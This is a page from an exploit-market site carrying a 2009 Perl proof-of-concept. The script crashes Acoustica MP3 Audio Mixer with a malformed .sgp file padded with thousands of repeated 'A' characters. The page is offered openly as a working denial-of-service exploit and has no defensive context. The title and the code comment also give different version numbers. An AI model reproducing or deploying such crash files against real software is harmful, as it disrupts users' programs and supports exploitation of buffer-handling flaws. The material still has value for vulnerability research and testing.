[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Acoustica MP3 Audio Mixer 2.471 (.sgp file) Crash Exploit

Author
prodigy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6931
Category
dos / poc
Date add
19-07-2009
Platform
unsorted
=========================================================
Acoustica MP3 Audio Mixer 2.471 (.sgp file) Crash Exploit
=========================================================


#!/usr/bin/perl -w
#
# Acoustica MP3 Audio Mixer 1.0 (.sgp file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Usage to reproduce the bug: when you created the malicious file, open it from the menu of the program and booom!!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "crash.sgp";

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "File Created successfully\n";




#  0day.today [2024-11-15]  #